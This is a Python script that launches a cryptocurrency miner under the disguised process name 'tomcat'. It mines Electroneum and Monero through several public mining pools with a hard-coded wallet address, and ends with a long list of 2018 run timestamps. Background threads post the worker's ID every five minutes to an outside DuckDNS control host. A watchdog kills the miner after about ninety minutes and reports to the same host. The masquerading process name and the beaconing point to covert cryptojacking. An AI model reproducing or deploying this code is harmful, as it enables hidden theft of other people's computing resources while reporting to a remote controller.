import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:04.367218
#2018-02-17 16:39:05.084041
#2018-02-17 18:27:07.468269
#2018-02-17 20:16:01.592289
#2018-02-17 22:03:01.698353
#2018-02-17 23:47:03.416127
#2018-02-18 01:38:06.982503
#2018-02-18 03:25:06.975895
#2018-02-18 05:13:05.635301
#2018-02-18 07:06:03.363312
#2018-02-18 08:54:02.010942
#2018-02-18 10:40:09.148917
#2018-02-18 12:25:06.039579
#2018-02-18 14:13:06.369078
#2018-02-18 16:03:05.178586
#2018-02-18 17:51:01.974797
#2018-02-18 19:38:03.652668
#2018-02-18 21:23:05.074213
#2018-02-18 23:12:05.287200
#2018-02-19 00:58:04.512553
#2018-02-19 02:46:06.319740
#2018-02-19 04:32:04.436686
#2018-02-19 06:19:04.837878
#2018-02-19 08:07:02.093276
#2018-02-19 09:57:03.787987
#2018-02-19 11:47:01.553907
#2018-02-19 13:33:09.258765
#2018-02-19 15:22:08.383280
#2018-02-19 17:11:07.700503
#2018-02-19 18:57:06.469431
#2018-02-19 20:45:10.289557
#2018-02-19 22:33:01.488666
#2018-02-20 00:17:05.744849
#2018-02-20 02:04:07.920252
#2018-02-20 03:54:03.746937
#2018-02-20 05:38:05.477285
#2018-02-20 07:23:01.341956
#2018-02-20 09:08:06.655989
#2018-02-20 10:51:05.880726
#2018-02-20 12:38:05.291710
#2018-02-20 14:23:04.868059
#2018-02-20 16:08:08.312935
#2018-02-20 17:55:04.231922
#2018-02-20 19:46:05.774683
#2018-02-20 21:36:04.100745
#2018-02-20 23:19:04.282020
#2018-02-21 01:02:07.945549
#2018-02-21 02:49:04.489164
#2018-02-21 04:37:06.057757
#2018-02-21 06:25:03.652920
#2018-02-21 08:11:06.524267
#2018-02-21 09:58:06.071015
#2018-02-21 11:46:04.660868
#2018-02-21 13:37:06.026524
#2018-02-21 15:21:06.163276
#2018-02-21 17:13:07.326575
#2018-02-21 19:00:08.043207
#2018-02-21 20:48:09.393920
#2018-02-21 22:34:01.283089
#2018-02-22 00:23:06.624166
#2018-02-22 02:10:06.379964
#2018-02-22 03:56:01.893230
#2018-02-22 05:43:01.267759
#2018-02-22 07:28:03.931911
#2018-02-22 09:16:01.356785
#2018-02-22 11:03:07.172666
#2018-02-22 12:49:02.122995
#2018-02-22 14:37:04.611537
#2018-02-22 16:23:04.762002
#2018-02-22 18:10:11.005197
#2018-02-22 19:58:02.066993
#2018-02-22 21:46:08.750317
#2018-02-22 23:35:04.152742
#2018-02-23 01:22:08.286484
#2018-02-23 03:09:07.536162
#2018-02-23 04:57:05.400377
#2018-02-23 06:43:05.215022
#2018-02-23 08:33:03.617697
#2018-02-23 10:46:07.137425
#2018-02-23 12:41:06.126445
#2018-02-23 14:25:05.803227
#2018-02-23 16:16:01.756480
#2018-02-23 18:03:04.370498
#2018-02-23 19:48:01.784681
#2018-02-23 21:32:02.110026
#2018-02-23 23:19:05.153665
#2018-02-24 01:11:03.811566
#2018-02-24 03:02:06.175955
#2018-02-24 04:48:07.433865
#2018-02-24 06:31:07.314067
#2018-02-24 08:19:06.075616
#2018-02-24 10:03:07.456702
#2018-02-24 12:01:05.557456
#2018-02-24 13:48:07.061775
#2018-02-24 15:37:05.293562
#2018-02-24 17:32:03.903865
#2018-02-24 19:18:01.944004
#2018-02-24 21:07:01.945205
#2018-02-25 01:12:04.212458
#2018-02-25 04:59:04.300408
#2018-02-25 09:35:01.573865